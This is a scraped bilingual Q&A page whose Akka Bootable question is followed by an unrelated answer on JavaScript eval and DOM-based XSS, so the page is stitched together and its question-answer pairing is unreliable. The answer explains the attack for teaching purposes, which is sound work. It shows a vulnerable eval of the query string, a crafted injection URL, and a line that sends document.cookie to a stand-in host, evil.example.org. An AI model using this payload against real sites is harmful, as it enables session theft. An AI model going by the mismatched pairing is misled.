Akka - 我什么时候应该使用Bootable类(Akka - when should I use the Bootable class)
在Akka中,我可以从main()初始化一个actor系统,如下所示:
object HostManagerApp { def main(args: Array[String]) { val system = ActorSystem("Foo", ConfigFactory.load.getConfig("Bar")) } }或者,我可以从扩展
Bootable的类中执行相同的操作。 正如文档中所提到的,这也允许我从命令行启动应用程序。 这两种方法有什么区别?In Akka, I can initialize an actor system from the main(), like this:
object HostManagerApp { def main(args: Array[String]) { val system = ActorSystem("Foo", ConfigFactory.load.getConfig("Bar")) } }Alternatively, I can do the same from a class that extends
Bootable. As mentioned in the docs, this also allows me to start the app from the command line. What's the difference between the two approaches?
原文:https://stackoverflow.com/questions/11527769
最满意答案
例如,任何恶意用户都可以打开chrome调试器,并修改正在执行的javascript代码。 所以他可以把自己的功能放到执行等。
是的,用户可以使用开发人员工具使用JavaScript“攻击”他们自己的客户端会话。
但是,eval和开发人员工具之间的区别在于eval可以在可共享链接中执行操作。 攻击者可以向受害者发送一个链接,该链接利用代码评估功能。
拿这个代码:
<script> eval('alert("Your query string was ' + unescape(document.location.search) + '");'); </script>现在,如果查询字符串是
?foo您只需获得一个警告对话框,说明以下内容:Your query string was ?foo现在说Chuck给Bob发了一封电子邮件,上面写着“看看这个伟大的链接!”。
链接构造如下:
http://www.example.com/page.htm?hello%22);alert(document.cookie+%22,其中www.example.com是您的网站。这会修改
eval()执行的代码alert("Your query string was hello"); alert(document.cookie+"");(为了清楚起见,我添加了新的线条)。 这将显示一个显示所有非httpOnly cookie的警告框。
将其带到下一阶段,攻击者可以构建一个图像链接,将会话cookie发送给自己
new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)这称为跨站点脚本(XSS)攻击。 实际上,该类型是基于DOM的XSS,具体而言。
一般有“安全javascript代码”这样的东西吗?
是的,可以将对XSS安全的代码视为“安全的JavaScript代码” - 它可以保护当前用户免受跨域攻击。 但是,使用开发人员工具“信任”当前最终用户不会根据自己的优势修改JavaScript代码或变量的服务器端代码并不安全。
因此,安全的JavaScript代码就是这样的代码,它只能保护当前用户。
Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.
Yes, a user can "attack" their own client-side session using JavaScript by using developer tools.
However, the difference between eval and developer tools is that eval may execute things in shareable links. The attacker could send their victim a link, which exploits the code evaluation function.
Take this code:
<script> eval('alert("Your query string was ' + unescape(document.location.search) + '");'); </script>Now if the query string is
?fooyou simply get an alert dialog stating the following:Your query string was ?fooNow say Chuck sends Bob an email with the subject "Look at this great link!".
The link is constructed as follows:
http://www.example.com/page.htm?hello%22);alert(document.cookie+%22, where www.example.com is your website.This modifies the code that is executed by
eval()toalert("Your query string was hello"); alert(document.cookie+"");(New lines added by me for clarity). This will show an alert box displaying all the non httpOnly cookies.
Take this to the next stage and the attacker could construct an image link to send the session cookie to themselves
new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)This is known as a Cross-Site Scripting (XSS) attack. In fact, the type is a DOM based XSS, to be specific.
Is there such thing as "secure javascript code" in general?
Yes, code that's secure against XSS could be considered "secure JavaScript code" - it protects the current user from cross-domain attacks. However, server-side code that "trusts" that the current end-user won't modify JavaScript code or variables to their own advantage using developer tools though isn't secure.
Therefore secure JavaScript code is such code that will protect the current user only.
相关问答
更多-
javascript的eval函数[2022-08-28]
eval就是把字符串转成可执行代码。 例如: eval("alert('test')"); -
JAVASCRIPT中的EVAL()函数问题?如下:[2023-09-03]
eval 可以执行一个字符串,不仅仅是变量。比如,你有 9 个函数,func1 ~ func9,你根据变量 i 的值(1~9),决定调用哪个函数,平时你需要写: switch(i) { case 1: func1(); break; case 2: func2(); break; …… (要写 9 行) } 但是用 eval,你只需要写 1 行就够了: eval("func" + i + "()"); 这回应该可以理解了吧。 -
关于javascript的eval函数应用问题[2022-06-18]
这样试试呢 function show(id) { whichEl = document.getElementById("intro" + id); if (whichEl.style.display == "none") { document.getElementById("intro" + id).style.display=""; } else { document.getElementById("intro" + id).style.display="none"; } } -
(1,eval)('this')vs eval('this')在JavaScript中?((1, eval)('this') vs eval('this') in JavaScript?)[2024-03-26]
(1,eval)和纯旧的eval之间的区别在于前者是一个值 ,后者是一个左值。 如果它是一些其他标识符会更明显: var x; x = 1; (1, x) = 1; // syntax error, of course! 那就是(1,eval)是一个产生eval的表达式(就像, (true && eval)或(0 ? 0 : eval) ),但它不是eval的引用。 你为什么在乎? 那么,Ecma规范认为对eval的引用是一个“直接的eval调用”,而只是将eval作为一个间接的一个表达式和间接的eva ... -
使用Javascript eval():想知道代码安全性/漏洞(Using Javascript eval(): wondering about code security/vulnerabilities)[2024-01-25]
您可能只需要一个伪递归函数: function closeYears(years, speed, complete) { (function close(i){ if(!years[i]) return complete(); closeYear(years[i],speed,function(){ close(i+1); } ); })(0); } You probably just need a pseudo recursive ... -
单独留下, {}被解释为块 ,而不是对象。 它不包含任何语句,因此不会影响eval("1;{}") 。 要强制将其解释为对象,可以使用括号: eval("1;({})"); // {} Left alone, {} is interpreted as a block, not an object. It contains no statements, so does not affect the value of, say, eval("1;{}"). To force it to be interpre ...
-
javascript eval如何(javascript eval how to)[2022-04-17]
这应该做到这一点,不需要评估: var obj = {x: 2}; var value = obj['x']; This should do it, no need for eval: var obj = {x: 2}; var value = obj['x']; -
你应该改用一个回调函数。 你可以这样做: function fSwap(funcName, callback) { window[funcName] = callback; } fSwap("drawScene", function drawScene() { /* Do something */ }); 要直接回答您的问题,出现问题的是您正在为评估的一段代码分配一个值。 这是行不通的。 什么工作将是: function fSwap(funcName, code) { eval(funcN ...
-
我认为这是eval的有效用例。 但是,如果您曾经想要使用CSP(内容安全策略),这很棒..可能会禁用eval。 I think this is a valid usecase for eval. However, if you were to ever want to use CSP (content security policy), which is awesome.. eval may be disabled.
-
例如,任何恶意用户都可以打开chrome调试器,并修改正在执行的javascript代码。 所以他可以把自己的功能放到执行等。 是的,用户可以使用开发人员工具使用JavaScript“攻击”他们自己的客户端会话。 但是,eval和开发人员工具之间的区别在于eval可以在可共享链接中执行操作。 攻击者可以向受害者发送一个链接,该链接利用代码评估功能。 拿这个代码: